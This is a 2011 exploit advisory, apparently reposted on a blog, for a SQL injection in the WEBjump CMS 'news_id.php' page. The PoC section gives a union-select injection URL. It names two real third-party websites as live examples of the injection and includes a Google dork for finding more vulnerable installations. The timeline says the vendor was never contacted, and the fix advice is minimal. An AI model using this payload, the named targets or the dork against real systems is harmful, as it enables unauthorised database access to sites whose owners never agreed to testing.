-----------------------------------------------------------------------------------------
[AJS_ADVISORIES_07&2011] Content Management System WEBjump [news_id] Remote SQL Injection
-----------------------------------------------------------------------------------------
Author : Shamus
Date : January, 15th 2011 [GMT +7]
Location : Solo && Jogjakarta, Indonesia
Web : http://antijasakom.net/forum
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Content Management System WEBjump
Vendor : Content Management System WEBjump
Download : http://redakcni-system.webjump.cz/
Description : N/A
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~
A weakness has been discovered Content Management System WEBjump.
Where an attacker could exploit the gap that exists to obtain sensitive data within the database.
This vulnerability identified in the path "news_id".
PoC/Exploit:
~~~~~~~~~~
SQL injection vulnerability affects:
http://www.site.com/content/news_id.php?lang=en&id=-71%20union%20all%20select%201,2,3,version%28%29,5--
example:
- http://www.atriumtower.com/content/news_id.php?lang=en&id=-71%20union%20all%20select%201,2,3,version%28%29,5--
- http://www.webc-budapest.com/content/news_id.php?lang=en&id=-92%20union%20all%20select%201,2,3,version%28%29,5--
Dork:
~~~~~
Google : inurl:"news_id" powered by Content Management System WEBjump
Solution:
~~~~~
- Your script should filter metacharacters from user input.
- Edit the source code to ensure that input is properly verified.
Timeline:
~~~~~~~
- 14 - 01 - 2011 bug found
- 14 - 01 - 2011 no vendor contacted
- 15 - 01 - 2011 advisories release
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
oO0::::: Greetz and Thanks: :::::0Oo.
Tuhan YME
My Parents
SPYRO_KiD
K-159
lirva32
newbie_campuz
And Also My LuvLy wife :
..::.E.Z.R (The deepest Love I'v ever had..).::..
in memorial :
1. Monique
2. Dewi S.
3. W. Devi Amelia
4. S. Anna
oO0:::A hearthy handshake to: :::0Oo
~ Crack SKY Staff
~ Echo staff
~ antijasakom staff
~ jatimcrew staff
~ whitecyber staff
~ lumajangcrew staff
~ devilzc0de staff
~ unix_dbuger, boys_rvn1609, jaqk, byz9991, bius, g4pt3k, anharku, wandi, 5yn_4ck, kiddies, bom2, untouch, antcode
~ arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci, x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber, kucinghitam, black_samuraixxx, ucrit_penyu, wendys182, cybermuttaqin
~ k3nz0, thomas_ipt2007, blackpaper, nakuragen, candra, dewa
~ whitehat, wenkhairu, Agoes_doubleb, diki, lumajangcrew a.k.a adwisatya a.k.a xyberbreaker, wahyu_antijasakom
~ Cruz3N, mywisdom,flyff666, gunslinger_, ketek, chaer.newbie, petimati, gonzhack, spykit, xtr0nic, N4ck0, assadotcom, Qrembiezs, d4y4x, gendenk, si bD, Jimmy Deadc0de, Rede Deadc0de
~ All people in SMAN 3
~ All members of spyrozone
~ All members of echo
~ All members of newhack
~ All members of jatimcrew
~ All members of Anti-Jasakom
~ All members of whitecyber
~ All members of Devilzc0de
#e-c-h-o, #K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding, #jatimcrew, #antijasakom, #whitecyber, #devilzc0de
---------------------------------------------------------------------------
Contact:
~~~~~~~~~
Shamus : Shamus@antijasakom.net
Homepage: https://antijasakom.net/forum/viewtopic.php?f=38&t=696
-------------------------------- [ EOF ] ----------------------------------
0 komentar:
Post a Comment